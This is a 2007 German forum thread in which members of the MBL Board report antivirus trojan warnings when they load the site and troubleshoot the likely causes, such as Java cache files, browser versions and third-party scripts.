Druckbare Version des Themas
Hier klicken um das Thema im Original Format zu betrachten.
MBL Board > Rund um MBL > Trojaner hier bei MBL?


Geschrieben von: Heby am Tue, 20 February 2007, 12:43
Da hat mein VirenProgramm aber gerade geschriehen.

Zitat (Doppelklick zum übernehmen)
20.02.2007 12:40:14 Skript: http://www.mbl-board.com/board/index.php?  gefunden: trojanisches Programm Trojan-Downloader.JS.Psyme.cz


iss doch bestimmt nich so richtig ?

Heby

Geschrieben von: Sidschei am Tue, 20 February 2007, 14:55
in der index.php? Das erscheint mir nahezu unmoeglich gruebel.gif

Zumal sie das Datum vom 1.2.2005 traegt und damit an sich nicht veraendert ist. Was aussergewoehnliches erkennen kann ich auch nicht... Ausserdem hab ich noch nie von ner PHP-Datei ne Trojaner-Meldung bekommen - sonst wer von Euch?

welches Virenprogramm meldet denn das ?

Geschrieben von: Riv_al_do am Tue, 20 February 2007, 15:29
Also ich hab hin und wider auch mal Meldung durch meinen avast-Virenscanner wenn ich das Board aufrufe und der empfiehlt mir dann die Zwangstrennung der Seite - nicht der kompletten Inet-Verbindung. Wenn das mal wieder auftritt muss ich mir mal die Meldung aufschreiben floet.gif

Geschrieben von: GreatWhite am Tue, 20 February 2007, 15:31
Sid, ich hab dir dazu mal ne Mail geschickt !

winke2.gif Greaty

Geschrieben von: Sidschei am Tue, 20 February 2007, 17:18
@Riv: haengt das mit "Sun Java" zusammen ?

Dann wuerde das jedenfalls mehr Sinn ergeben, als die "Index.php"

Geschrieben von: Sidschei am Tue, 20 February 2007, 17:31
hab da gerade was gefunden: http://forum.kaspersky.com/index.php?act=Print&client=printer&f=27&t=29948
scheint ja ungefaehr ein aehnliches Problem - ohne loesung und wirkliches problem zu sein ? gruebel.gif

Geschrieben von: Heby am Tue, 20 February 2007, 18:52
Genau dieses Programm nutze ich

Kaspersky AntiVirus 6.0

Iss Heute das erste mal gewesen , das es angesprungen ist

gerade schon wieder

gruebel.gif

Geschrieben von: Andi am Tue, 20 February 2007, 20:58
Norton hat noch nicht beim Aufruf der Seite gemeckert.

Im Firefox sehe ich nur jede Menge davon z_bootyshake.gif
nicht wirklich einladend tongue.gif

beim IE werden die Aersche nicht angezeigt

Geschrieben von: Sidschei am Wed, 21 February 2007, 13:29
solangsam komm ich mir verarscht vor tongue.gif

screenshots bitte...

Geschrieben von: Guest am Wed, 21 February 2007, 18:32
Zitat (Doppelklick zum übernehmen) (Sidschei @ Wed, 21 February 2007, 13:29)
screenshots bitte...

user posted image

Geschrieben von: gizmo am Wed, 21 February 2007, 18:53
Hm, just hat bei mir der Bitdefender auch genörgelt : Trojan.JS.Downloader.B sad.gif

Also irgendetwas scheint seit Neuestem (gestern hats das jedenfalls noch nicht getan) den Virenwächter aufzuregen

gruss

giz winke.gif

Geschrieben von: Sidschei am Wed, 21 February 2007, 19:07
*rotfl* Der Screenshot ist genial thumbsup.gif Hat denn das sonst noch einer ?!?

Der ist so wie's aussieht als Tabellenhintergrund eingetragen loli.gif Das ist wirklich toll, ich brech ab zahn.gif Gibts fuer Firefix nen "Aendere Tabellenhintergruende"-PlugIn von dem ich nichts weiss ?

Sorry, ich kann nicht mehr, das ist echt klasse *lol*

Zurueck zur Ernsthaftigkeit: Andi, wenn du willst schick mir bitte mal den "Seitenquelltext" zu (rechte Maustaste, Seitenquelltext anzeigen --> speichern, schicken).

Da ich das in keinem meiner 4 Browser hab, bin ich da etwas machtlos mal wieder... wuerd aber schon gerne sehen, wie das implementiert ist.

Ihr Virenproblemer: Schaut Ihr bitte mal, ob das Teil im JAVA-Verzeichnis lokalisiert ist. Meine Guete, wie soll ich denn irgendwas machen, wenns ueberall anders ist laugh.gif

Geschrieben von: GreatWhite am Wed, 21 February 2007, 19:19
Zitat (Doppelklick zum übernehmen)
Hm, just hat bei mir der Bitdefender auch genörgelt : Trojan.JS.Downloader.B

Also irgendetwas scheint seit Neuestem (gestern hats das jedenfalls noch nicht getan) den Virenwächter aufzuregen


Hi Gizmo winke2.gif

also ich hab noch vor der "Störung" heute morgen mein gesamtes Sytem mit allem, was nur einigermaßen etwas finden kann durchforstet. AntiVir hat den "Schädling" gefunden und seitdem ist Ruhe. Vorher kam bei jedem Aufrufen des Boardes ebenfalls eine Warnung.

Hoffe, das es jetzt damit erledigt ist ! rolleyes.gif

Greaty

Geschrieben von: Andi am Wed, 21 February 2007, 19:29
Zitat (Doppelklick zum übernehmen) (Sidschei @ Wed, 21 February 2007, 19:07)
*rotfl* Der Screenshot ist genial thumbsup.gif Hat denn das sonst noch einer ?!?


mit der Zeit nervt es allerdings tongue.gif

user posted image

die einzigen Seiten die "sauber" sind, scheinen die Seiten zu sein, wo die Themen aufgeführt werden

user posted image


Geschrieben von: Mario Gomez am Wed, 21 February 2007, 21:35
Ich hatte bisher noch keine Viren-/Trojaner-Meldung, bekomme aber auch die "Ärsche" in keinem meiner Browser angezeigt.


Hab mal meine Java-Ordner gescannt und dort wurden 4 Viren (VBS:Malware [Gen]) gefunden.
Diese hab ich vor 10 Tagen bei einem Systemscan dort schonmal gehabt. Keine Ahnung, woher die kommen. nixweiss.gif

Benutze auch avast (Version 4.7 Professional), komisch, daß avast bei Riv motzt und bei mir nicht. headscratch.gif


http://img57.imageshack.us/my.php?image=zwischenablage1mz1.jpg

Geschrieben von: Sidschei am Wed, 21 February 2007, 21:47
Zitat (Doppelklick zum übernehmen) (Strunz @ Wed, 21 February 2007, 22:35)
Benutze auch avast (Version 4.7 Professional), komisch, daß avast bei Riv motzt und bei mir nicht. headscratch.gif

Na, nach dem Link den ich da gepostet hat, wundert mich das nicht wirklich... das scheint nicht generell am Board zu liegen, denke ich mir - sondern das Board dient wenn dann eher als Ausloeser fuer ein anderes Problem...

Das mit den Aerschen bleibt mir bisher noch ein Raetsel - koennte aber sinnbildlich zu verstehen sein icon22.gif Hast du das auch in anderen Browsern, Andi=

Geschrieben von: Guest am Wed, 21 February 2007, 22:00
Dann versuche ich mal, auch ein bisserl beizusteuern. Seitdem kam nix mehr *aufholzklopp*

user posted image

Ich hoffe, das hilft ein bisserl... rolleyes.gif

Geschrieben von: Guest am Wed, 21 February 2007, 23:01
Zitat (Doppelklick zum übernehmen) (Sidschei @ Wed, 21 February 2007, 21:47)

Das mit den Aerschen bleibt mir bisher noch ein Raetsel - koennte aber sinnbildlich zu verstehen sein icon22.gif

na dann muß ich wohl danke.gif sagen, mach ich aber nicht tongue.gif

Zitat (Doppelklick zum übernehmen)
Hast du das auch in anderen Browsern, Andi=


Netscape 7.1 = nein

IE 6.0 = nein

Firefox 1.5.0.9 = leider ja dry.gif

sonst hab ich weiter keine Browser installiert

Geschrieben von: Sidschei am Thu, 22 February 2007, 10:31
Zitat (Doppelklick zum übernehmen) (Guest @ Thu, 22 February 2007, 00:01)
Firefox 1.5.0.9 = leider ja dry.gif

Danke erstmal fuer die Browseruebersicht und die Grafik smile.gif

Die Mozilla-Version ist schon recht alt - momentan ist V2.xxx aktuell. Hat das spezielle Gruende, dass Du mit der alten Version faehrst oder lege es im Rahmen der Moeglichkeit den mal upzudaten und dann zu schauen, ob die Aersche immer noch da sind (was ich irgendwie ohne es begruenden zu koennen fast vermute *lach* )

Ist mir immer noch ein Raetsel, denn der Quellcode hat auf den ersten Blick nichts verdaechtiges geliefert - und wenn ich den Abspeichere und die gespeicherte Seite aufrufe, sind sie auch nicht da gruebel.gif

Zitat (Doppelklick zum übernehmen)
user posted image


Das ist genau das, was ich vermutet hab. Das Teil befindet sich im "Sun-Java-Cache" Verzeichnis. Ich hab zugegebenermassen keine Ahnung, warum das Java anspringt, wenn man dieses Board aufruft - aber benoetigt wird es definitiv nicht, ich habs naemlich nicht nur deaktiviert, sondern erst gar nicht aktiviert laugh.gif

Wenn man mal "BlackBox.AA.1" bei Google eintippt, findet man recht viele Eintraege dazu. eine klare Aussage, was dieses Ding ist bzw. wo es herkommt hab ich allerdings nich nicht gefunden...

Hinweislich fand ich folgenden Text:
Zitat (Doppelklick zum übernehmen)
Hallo nochmals,

also ich fühle mich eigentlich wieder sicher jetzt, obwohl ich nicht viel getan habe. Zu Reht?
Meine Recherche im Netz ergab:

[...]

da heisst es, man solle mal hier schauen:

--> http://www.java.com/de/download/help/cache_virus.xml <--

dort ist ein link auf:

http://www.microsoft.com/technet/secu...


Ich find nur leider nirgends Antworten darauf, wie das Ding auf den Rechner kommen kann - falls da jemand besser ist als ich... gerne biggrin.gif


Ach ja, und:
Zitat (Doppelklick zum übernehmen)
na dann muß ich wohl danke.gif sagen, mach ich aber nicht tongue.gif


damit meinte ich mehr, dass du dich auf einem Board befindest, wo sich halt nur Aersche rumtreiben - war nicht auf dich bezogen zwinker.gif


Geschrieben von: Mario Gomez am Thu, 22 February 2007, 10:56
Daß Antivir bei Andi nen Virus meldet, ist nicht weiter verwunderlich. Das war mal ein guter Virenscanner....Mittlerweile erkennt das Ding Viren als solche, die keine sind, und tatsächliche erkennt er nicht.

Hatte den Jahre lang drauf und urplötzlich meldete er Viren in Files, die ich seit Ewigkeiten auf dem Rechner habe und genauso lang schon nicht mehr angerührt wurden.

Eine Freundin hat sich neulich mehrere Trojaner eingefangen, obwohl ihr Antivir immer aktuell ist.

Dem Ding würd ich also nicht wirklich vertrauen...

Geschrieben von: Sidschei am Thu, 22 February 2007, 11:34
Solche Geschichten gibt es en masse ueber alle Virenscannen - und auch wenn du das sicherlich weisst: Es gibt Trojaner und Viren, die einmal auf dem System bestimmte Dateitypen befallen koennen, ohne Dein Beitragen.

Geschrieben von: Guest am Thu, 22 February 2007, 17:13
Zitat (Doppelklick zum übernehmen) (Strunz @ Thu, 22 February 2007, 10:56)
Daß Antivir bei Andi nen Virus meldet, ist nicht weiter verwunderlich.

Da hast du was falsch gelesen zwink.gif

Antivir hab ich nicht auf dem Rechner, kommt mir auch nicht drauf.

Norton hat noch nicht gemeckert, hab ich geschrieben zwink.gif

@ Sid

Den Firefox wollte ich über die Hilfe aktualisieren - geht aber nicht dry.gif
Da muß ich mir mal ne aktuelle Version runterladen und drüberinstallieren.

Andi

Geschrieben von: Mario Gomez am Thu, 22 February 2007, 17:15
Die Grafik sah für mich wie Antivir aus.gruebel.gif

Geschrieben von: Sidschei am Thu, 22 February 2007, 17:20
Da kann man nachhelfen, Andi:
http://www.mozilla-europe.org/de/products/firefox/

btw: sind als Gast die ganzen Aersche weg? laugh.gif sorry, ich find das immer noch lustig laugh.gif

Geschrieben von: Epi am Thu, 22 February 2007, 18:07
Zitat (Doppelklick zum übernehmen) (Strunz @ Thu, 22 February 2007, 17:15)
Die Grafik sah für mich wie Antivir aus.gruebel.gif

Da haste auch richtig geguckt, wurde aber von mir gepostet tongue.gif

Sorry für's Verwirrung stiften rolleyes.gif

Geschrieben von: Sidschei am Thu, 22 February 2007, 18:30
Zitat (Doppelklick zum übernehmen) (Epi @ Thu, 22 February 2007, 19:07)
Zitat (Doppelklick zum übernehmen) (Strunz @ Thu, 22 February 2007, 17:15)
Die Grafik sah für mich wie Antivir aus.gruebel.gif

Da haste auch richtig geguckt, wurde aber von mir gepostet tongue.gif

Sorry für's Verwirrung stiften rolleyes.gif

Ach so - das war ein anderer Gast als Andi laugh.gif ja, ich dachte auch, das waer Andi zwinker.gif

Umsomehr danke fuers melden, auch wenn ich/wir nicht wirklich weiterwissen bzw. helfen koennen dabei momentan sad.gif

Geschrieben von: Riv_al_do am Thu, 22 February 2007, 20:01
Ich habe mittlerweile mal avast laufen lassen und der hat wirklich 3 Dateien im Bereich Anwendungsdaten/Sun/Java gefunden und isoliert. Seitdem ist Ruhe - aber wieso die Dinger, die als Malware tituliert waren, überhaupt gemotzt haben konnte ich auch mit googeln nicht rausfinden. Mittlerweile hab ich die Dateien auch komplett gekickt also kann ich nicht mehr sagen wie die heissen floet.gif

Geschrieben von: Sidschei am Fri, 23 February 2007, 06:51
Zitat (Doppelklick zum übernehmen) (Riv_al_do @ Thu, 22 February 2007, 21:01)
Ich habe mittlerweile mal avast laufen lassen und der hat wirklich 3 Dateien im Bereich Anwendungsdaten/Sun/Java gefunden und isoliert.

Seltsam ist das schon, zugegeben. Aber irgendwo auch der Hinweis meiner Meinung nach, dass es nichts implizit mit dem Board hier zu tun hat, denn das braucht kein Java - auch wenn ich immer noch nicht verstehe, warum sich das bei manchen startet, wenn man es aufruft gruebel.gif

Geschrieben von: Guest am Fri, 23 February 2007, 16:08
blink.gif

wo sind die Ärsche hin? gruebel.gif

hab die 2.0 jetzt drauf zwink.gif

Andi

Geschrieben von: Sidschei am Fri, 23 February 2007, 16:12
Zitat (Doppelklick zum übernehmen) (Guest @ Fri, 23 February 2007, 17:08)
blink.gif

wo sind die Ärsche hin? gruebel.gif

hab die 2.0 jetzt drauf  zwink.gif

Fein wenn sie nun weg sind smile.gif Mich wuerd zwar ehrlich gesagt interessieren, wie das zustande kommt - denn im Quelltext konnte ich definitiv nichts entdecken - aber lassen wir's gut sein laugh.gif zwinker.gif Manchmal lohnt updaten halt doch zahn.gif

Danke fuers Rueckmelden...

Geschrieben von: Heby am Fri, 23 February 2007, 18:29
Bei mir kommt auch keine Meldung mehr

thumbsup.gif

Heby

Geschrieben von: Heby am Mon, 26 February 2007, 18:47
jetzt war paar Tage ruhe , aber gerade wieder ...

Zitat (Doppelklick zum übernehmen)
26.02.2007 18:46:16 Skript: http://www.mbl-board.com/board/index.php[1] gefunden: trojanisches Programm Trojan-Downloader.JS.Psyme.cz


gruebel.gif

Geschrieben von: Sidschei am Mon, 26 February 2007, 19:12
ist das alles, oder steht da vielleicht noch mehr bei ? Und mal den Browser vielleicht nennen ? zwinker.gif

gerade auch gefunden:
Zitat (Doppelklick zum übernehmen)
ADMIN: Ist bekannt ... Trat nur beim Internet Explorer auf ... wurde durch ein Script von Skype hervorgerufen. ES HANDELTE SICH ABER NICHT UM EINEN TROJANER!!! Dieses Script sollte eigentlich meinen Skype Onlinestatus anzeigen. Nach Entfernung des Scriptaufrufs ist ist nun auch diese FALSCHE Trojanerwarnung weg.



Geschrieben von: Heby am Tue, 27 February 2007, 20:08
gruebel.gif

nee , das iss alles was dort im programm steht

Internet Explorer 6

Meldung kam gerade wieder.

Skype nutze ich nicht.

Heby

Geschrieben von: Sidschei am Tue, 27 February 2007, 20:40
Das musst auch nicht du benutzen rolleyes.gif

Test mal schlichtweg nen anderen Browser - momentan scheinst du der einzigste mit dem Problem zu sein, und selbst wenn nicht wuesste ich nicht, was damit anfangen laugh.gif

Allerdings hab ich mit meinem IE gerade was festgestellt - will der bei dir die Seite "radiodeejay" aus .hr laden ? Weil das finde ich nun doch etwas seltsam gerade gruebel.gif

Geschrieben von: Guest am Mon, 05 March 2007, 01:51
Seit 2 Tagen meldet sich bei mir auch der Herr Norton mit der Trojaner Warnung,
wenn ich die Board Page aufrufe.
Hat's vorher nie gegeben.

Norton ist mit den aktuellen Updates gefüttert,
und ich benutze den IE 6

Ein kompletter Rechner Scan bleibt ergebnislos,
Norton filtert wahrscheinlich vorher alles raus,
bevor es sich auf der Platte einnisten kann

Guest

Geschrieben von: Guest am Mon, 05 March 2007, 08:45
Zitat (Doppelklick zum übernehmen) (Guest @ Mon, 05 March 2007, 01:51)
Seit 2 Tagen meldet sich bei mir auch der Herr Norton mit der Trojaner Warnung,
wenn ich die Board Page aufrufe.
Hat's vorher nie gegeben.

Norton ist mit den aktuellen Updates gefüttert,
und ich benutze den IE 6

Ein kompletter Rechner Scan bleibt ergebnislos,
Norton filtert wahrscheinlich vorher alles raus,
bevor es sich auf der Platte einnisten kann

Guest

und was genau sagt der Herr Norton? unsure.gif

bei mir sagt er nämlich weder bei IE6 noch bei Firefox etwas

Andi

Geschrieben von: Guest am Tue, 06 March 2007, 02:19
Zitat (Doppelklick zum übernehmen)
und was genau sagt der Herr Norton? 

bei mir sagt er nämlich weder bei IE6 noch bei Firefox etwas

Andi


Na Ja, was Norton halt zu sowas sagt biggrin.gif

Da geht das wunderschöne POP Up auf,
wo drin steht das der Trojaner "Bs Psyme Downloader"
gefunden wurde, und Norton ihn geblockt hat.

Als Sicherheitsrisiko wird er als " Hoch" eingestuft.

Hier wurde ja schonmal gemutmasst, das es evtl. von Skype kommen könnte.
Aber das habe ich nicht installiert.

Guest

Geschrieben von: Sidschei am Tue, 06 March 2007, 11:32
Also nochmals zur Erklaerung: MAN MUSS SKYPE NICHT INSTALLIERT HABEN, um die Meldung zu bekommen. Sondern es ging um Skripte, die den Skype-Status (auch anderer) anzeigen! Das einzige was ich hierbei nicht kapiere ist, wie das auf die Seite kommen soll, zumindest waer mir nicht bekannt dass wir das haben tongue.gif

auch die unterschiedlichen "Namen" find ich seltsam und die Frage nach dem "Laden von Fremdseiten" wurde leider noch nicht beantwortet.

Geschrieben von: Mario Gomez am Tue, 06 March 2007, 14:47
Zitat (Doppelklick zum übernehmen) (Sidschei @ Tue, 06 March 2007, 11:32)
auch die unterschiedlichen "Namen" find ich seltsam...

Naja, fast jeder Virenscanner nennt die Dinger doch anders.

Ganz was anderes...was mit tierisch nervt ist dieses Gewinnspiel-Fenster auf der Main.
Hab jetzt die url in den Content-Filter eingegeben, dann sollte jetzt damit Sense sein.

Edit: Jetzt macht er "nur" noch ein leeres Fenster auf. mad.gif

Geschrieben von: Sidschei am Tue, 06 March 2007, 15:19
du meinst nun unsere Hauptseite und nicht das Forum... das liegt am Counter - vielleicht sollte ich den nun doch mal austauschen floet.gif ich gestehe, dass ich bisher nur zu Faul dafuer war und mein Pop-Blocker den eigentlich zu 98% abfaengt...

Geschrieben von: Epi am Thu, 15 March 2007, 21:44
Nu geht das wieder los hier unsure.gif

user posted image

Dann bietet Antivir mir ja mehrere Möglichkeiten, was ich mit dem Schlingel anstellen kann.
Aktiviert ist "Zugriff verweigern"... Wenn ich mich dann aber für "Quarantäne" entscheide,
wird in der Browser-Statusleiste angezeigt, dass Daten von "life.c-commando.info" geladen werden oneeye.gif
Hab den Browser dann flott geschlossen, aber ich werde meine HD doch wohl mal etwas
genauer inspizieren lupe.gif

http://smartdefense.zonelabs.com/tmpl/body/virus/virusSearch_ks.jsp?VN=Trojan-Downloader.JS.Small.dz&view=sdrc&reset=t

Liebe Grüße,

Epi

Geschrieben von: Sidschei am Thu, 15 March 2007, 21:59
Womit wir wieder bei Sun und Java waeren - deinstallier das Java mal, dann bist Du das Problem los zwinker.gif

Oder lass von Antivir die Dateien loeschen - dann passiert offensichtlich auch nichts... zumindest hab ich nichts von dem was in deinem Link geschrieben steht auf dem Rechner, und die Meldung vor einiger Zeit auch mal gehabt...

Ich kann mir nicht vorstellen, dass das mit dem Board zusammenhaengt - oder sagen wir so: ich koennte nicht verstehen, wie das zusammenhaengen soll im moment... Lass mich aber gerne aufklaeren smile.gif Ueber Google und Co. konnte ich zumindest aber nichts finden.

Geschrieben von: Epi am Fri, 16 March 2007, 16:19
Zitat (Doppelklick zum übernehmen) (Sidschei @ Thu, 15 March 2007, 21:59)
Womit wir wieder bei Sun und Java waeren - deinstallier das Java mal, dann bist Du das Problem los zwinker.gif


tongue.gif

Zitat (Doppelklick zum übernehmen)
Oder lass von Antivir die Dateien loeschen - dann passiert offensichtlich auch nichts... zumindest hab ich nichts von dem was in deinem Link geschrieben steht auf dem Rechner, und die Meldung vor einiger Zeit auch mal gehabt...


Ich hab just gerade wieder so ne Meldung bekommen und mich dann mal für "Nicht ausführen" entschieden und es passiert nix weiter...


Zitat (Doppelklick zum übernehmen)
Ich kann mir nicht vorstellen, dass das mit dem Board zusammenhaengt - oder sagen wir so: ich koennte nicht verstehen, wie das zusammenhaengen soll im moment... Lass mich aber gerne aufklaeren smile.gif Ueber Google und Co. konnte ich zumindest aber nichts finden.


Hmmm, ich habe aber heute noch nix anderes angesurft; von daher bin ich schon davon überzeugt, dass es was mit dem Board zu tun hat, da die Meldung just dann kommt, wenn die Seite angezeigt wird... Und auf anderen Seiten passiert das definitiv nicht...
Aber womit das wirklich zusammenhängt, da hab ich leider auch keinen blassen Schimmer von biggrin.gif

Und um Missverständnisse zu vermeiden: Ich wollte mich hier net beschweren oder ähnliches, das war/ist rein zur Information für Euch zwink.gif

Greetz, Epi

Geschrieben von: GreatWhite am Fri, 16 March 2007, 16:48
Hi Epi winke2.gif

Zitat (Doppelklick zum übernehmen)
Und um Missverständnisse zu vermeiden: Ich wollte mich hier net beschweren oder ähnliches, das war/ist rein zur Information für Euch


Worum wir aber auch ausdrücklich bitten zwinker.gif Das hat hier bestimmt auch keiner so aufgefasst nene3.gif

Ich habe (hatte) das gleiche Problem. Versuch doch mal folgendes : Schalte Jave ganz einfach mal ab und lösche den "Sun" Ordner in deinen Einstellungen. Danach war (zumindest bei mir ) Ruhe.

bis demnächst...

Greaty

Geschrieben von: Sidschei am Fri, 16 March 2007, 16:54
Zitat (Doppelklick zum übernehmen) (Epi @ Fri, 16 March 2007, 17:19)
Und um Missverständnisse zu vermeiden: Ich wollte mich hier net beschweren oder ähnliches, das war/ist rein zur Information für Euch zwink.gif

Keine Sorge, nicht so aufgefasst. Ich sag ja auch nur ehrlich, dass ich schlichtweg ratlos bin nixweiss.gif und irgendwie versuche, der Sache auf den Grund zu gehen.

Fakt ist, die Fehlermeldung kommt aus dem SUN/JAVA-Bereich - dazu findet man im Netz auch einige Infos zu. Weiterer Fakt scheint zu sein, dass das IBB diese Meldung heraufzurufen scheint - denn ich hab diese Fehlermeldung immer nur im Zusammenhang mit IBB gefunden und zwischenzeitlich auch von jemand anderem gehoert, dass mit IBB diese Probleme vorhanden seien.

Anderer Fakt ist auch, gemaess Websuche, dass es offensichtlich nicht vom Board einen Trojaner gibt, sondern das IBB(Board) der Ausloeser ist - sei es durch die integrierten "Skype-ICQ"-Anzeige-Protokollo oder was auch sonst immer. Das ist ja der Punkt, wo ich noch keinerlei Aufklaerung zu gefunden hab.

Ebenfalls scheint es ja so zu sein, dass dies nicht bei allen ausgeloest wird, womit das Board an sich als Ursache erneut ausscheidet und sich nur als Grund etabliert, der bei bestimmten (befallenen?) Systemen das ausloest.

Was mir GAENZLICH unklar ist und ich ueberhaupt nicht verstehe ist, warum der Aufruf des IBBs das Java startet und damit auch diese Fehlermeldung bzw Warnung ausloest. Wenn man das Java deinstalliert, ist das Problem naemlich definitiv weg und der Virenmelder schlaegt nicht mehr an. Und auf der anderen Seite braucht das Board kein Java, das ist mein groesstes Fragezeichen bei der Geschichte laugh.gif

Das sind die Dinge/Fakten, die ich zusammenbekommen habe - aber schlichtweg keinen sinnigen Zusammenhang zu finden kann.

Efi: Rufst du auch noch andere IBBs auf ?

Geschrieben von: Epi am Fri, 16 March 2007, 17:46
Zitat (Doppelklick zum übernehmen)
Worum wir aber auch ausdrücklich bitten zwinker.gif Das hat hier bestimmt auch keiner so aufgefasst nene3.gif


Zitat (Doppelklick zum übernehmen)
Keine Sorge, nicht so aufgefasst. Ich sag ja auch nur ehrlich, dass ich schlichtweg ratlos bin


Hihi, schön zu wissen biggrin.gif Man weiß ja nie; hab schon so das ein oder andere in anderen Boards miterlebt ;-


Zitat (Doppelklick zum übernehmen)
Ich habe (hatte) das gleiche Problem. Versuch doch mal folgendes : Schalte Jave ganz einfach mal ab und lösche den "Sun" Ordner in deinen Einstellungen. Danach war (zumindest bei mir ) Ruhe.


Thx, werd ich dann später mal ausprobieren... Haste Java später dann wieder aktiviert?


Davon ab, hab ich gerade mal was anderes angetestet: Ich bekomm die Warnung nur, wenn ich nen IP-Wechsel vollzogen habe, was mich dann jetzt komplett verwirrt *g*

Vor ein paar Wochen kam das immer, wenn der Browser neu aufgerufen wurde (ich lass beim Schließen immer gleich den Cache, Verlauf etc. löschen)...


Zitat (Doppelklick zum übernehmen)
Rufst du auch noch andere IBBs auf ?


Ich turne noch in einigen anderen Boards herum, da ist das noch nie passiert.
Aber ich weiß auch nicht wirklich, was da jeweils für ne Software verwendet wird.
Ich mach mal gleich ne Erkundungstour cool.gif

Haste nen Tipp auf Lager, wie ich da am schnellsten sehe, was die verwenden?

Geschrieben von: Guest am Fri, 16 March 2007, 18:11
Zitat (Doppelklick zum übernehmen) (Epi @ Fri, 16 March 2007, 17:46)
Ich mach mal gleich ne Erkundungstour cool.gif

So, IP gewechselt und alle Boards kurz inspiziert - keine Warnungen rolleyes.gif

Sofern ersichtlich, waren das Burning Board's (2.3.6, 2.3.3 etc.) und phpBB.
Hat wahrscheins nix mit dieser Boardsoft zu tun, oder?

Und kaum trudele ich wieder hier ein, wird mein Antivir wieder aktiv biggrin.gif


Jetzt teste ich dann GreatWhite's Variante mal an...

Geschrieben von: Sidschei am Fri, 16 March 2007, 18:32
Zitat (Doppelklick zum übernehmen) (Epi @ Fri, 16 March 2007, 18:46)
Zitat (Doppelklick zum übernehmen)
Worum wir aber auch ausdrücklich bitten zwinker.gif Das hat hier bestimmt auch keiner so aufgefasst nene3.gif

Greaty und Sid unabhaengig einer Meinung thumbsup.gif Fast wie eingeplant zahn.gif

Zitat (Doppelklick zum übernehmen)
Zitat (Doppelklick zum übernehmen)
Keine Sorge, nicht so aufgefasst. Ich sag ja auch nur ehrlich, dass ich schlichtweg ratlos bin

Hihi, schön zu wissen biggrin.gif Man weiß ja nie; hab schon so das ein oder andere in anderen Boards miterlebt ;-)


Ja, ne. Ist ja auch Fakt, dass das zumindest im Zusammenhang mit dem Board steht, sonst waer das Problem nicht da, ne. Aber ich will schon klarstellen, dass es NICHT von uns eingebaut ist laugh.gif Zumindest nicht absichtlich zahn.gif und ich nach wie vor glaube, dass das Board nur Katakysator, aber nicht Ursache ist.

Aber, wie ich auch sage, offen und ehrlich: Ich bin einfach momentan ratlos. Und lieber geb ich das zu als den Wissenden zu spielen floet.gif

Zitat (Doppelklick zum übernehmen)
Davon ab, hab ich gerade mal was anderes angetestet: Ich bekomm die Warnung nur, wenn ich nen IP-Wechsel vollzogen habe, was mich dann jetzt komplett verwirrt *g*


Ah ja... nun, nehmen wir das auch mal zur Kenntnis gruebel.gif Vielleicht fuehrt irgendwas mal zur Loesung smile.gif

Zitat (Doppelklick zum übernehmen)
Vor ein paar Wochen kam das immer, wenn der Browser neu aufgerufen wurde


2 Fragen zur Eingrenzung:

1) Welcher Browser
2) Kam das IMMER - oder kam das auch in der Zeit von damals bis jetzt nicht?


Zitat (Doppelklick zum übernehmen)
Zitat (Doppelklick zum übernehmen)
Rufst du auch noch andere IBBs auf ?

Ich turne noch in einigen anderen Boards herum, da ist das noch nie passiert.


Ja, ist auch bei mir hier das Einzige bisher - aber auch das einzige IBB, welches ich besuche zwinker.gif

Zitat (Doppelklick zum übernehmen)
Haste nen Tipp auf Lager, wie ich da am schnellsten sehe, was die verwenden?


Normalerweise sieht man das immer ganz unten auf der Startseite - wie bei uns - siehe Bild. Eigentlich haben das da alle gaengigen Boards stehen, aber ich muss es selbst auch erstmal nachschauen *g* Achte da nie so drauf biggrin.gif

Sid

Geschrieben von: Sidschei am Fri, 16 March 2007, 18:34
Zitat (Doppelklick zum übernehmen) (Guest @ Fri, 16 March 2007, 19:11)
Sofern ersichtlich, waren das Burning Board's (2.3.6, 2.3.3 etc.) und phpBB.
Hat wahrscheins nix mit dieser Boardsoft zu tun, oder?

Nein. Zumindest phpBB ist ein anderes, BurningBoard kenn ich nicht... Ich mach mal nen Streifzug durchs Netz (aber nicht mehr heute und nicht am WE (ist schliesslich FFF tongue.gif) , sondern Montag - ich schreib dann mal welche rein, vielleicht willst Du die mal antesten dann biggrin.gif

Geschrieben von: Epi am Fri, 16 March 2007, 19:03
Zitat (Doppelklick zum übernehmen) (Sidschei @ Fri, 16 March 2007, 18:34)
ich schreib dann mal welche rein, vielleicht willst Du die mal antesten dann biggrin.gif

Hehe, immer man her damit, teste ich gerne mal an party.gif


Ich hätte ja mal eher drauf kommen können, aber den IE mag ich mittlerweile halt nimmer mehr...
Wenn ich mit dem IE dieses Board besuche, passiert rein gar nix trotz aktiviertem Java.

So, und beim Firefox hab ich dann Java deaktiviert und den Sun-Ordner komplett gelöscht,
danach passiert hier auf der Seite nichts.
Habs dann wieder aktiviert, zack kam die Warnung wieder und in der Statusleiste taucht
dann dieses auf

user posted image

Ich google mal noch ein wenig, aber http://www.pragmamx.org/Forum-topic19633.0.html find ich schon mal recht spannend...



Und viel Spaß beim FFF smile.gif

Geschrieben von: Sidschei am Fri, 16 March 2007, 19:48
Oh, den Namen des Applets konnte ich bisher nicht sehen - interessant smile.gif

Der Link ist interessant, steht da wenigstens mal eine Variante drin, wie das passieren kann - auch wenn keine richtige Loesung genannt wird laugh.gif

Werd unter den Gesichtspunkten mal suchen und ggfs mit denen mal versuchen Kontakt aufzunehmen!

danke Epi - das hat wirklich mal einen entscheidenden Schritt gebracht, an dem man weiterarbeiten kann thumbsup.gif



sid

PS: Wenn du dich registierst, musst du den haken nicht immer setzen tongue.gif zahn.gif - sorry, konnt ich mir nicht verkneifen icon22.gif

Geschrieben von: Epi am Fri, 16 March 2007, 20:04
Zitat (Doppelklick zum übernehmen) (Sidschei @ Fri, 16 March 2007, 19:48)
PS: Wenn du dich registierst, musst du den haken nicht immer setzen tongue.gif zahn.gif - sorry, konnt ich mir nicht verkneifen icon22.gif

floet.gif

Nachdem ich vorhin mein eigenes Posting nicht sehen konnte,
hab ich das schon längst gemacht tongue.gif

Freut mich, wenn dir das weiterhilft... Ich hab noch ein paar Links auf Lager smile.gif

http://www.computer-brain.net/computer/exklusiv-neuer-exploit-nutzt-ms-sicherheitslucken-26.html

http://www.skyger.de/modules.php?op=modload&name=Splatt_Forum&file=viewtopic&topic=1227&forum=3

http://forum.sysinternals.com/forum_posts.asp?TID=9607


Wobei ich mit dem letzten Link am wenigsten anfangen kann,
aber vielleicht blickst du ja durch zwink.gif

Geschrieben von: Guest am Fri, 16 March 2007, 21:53
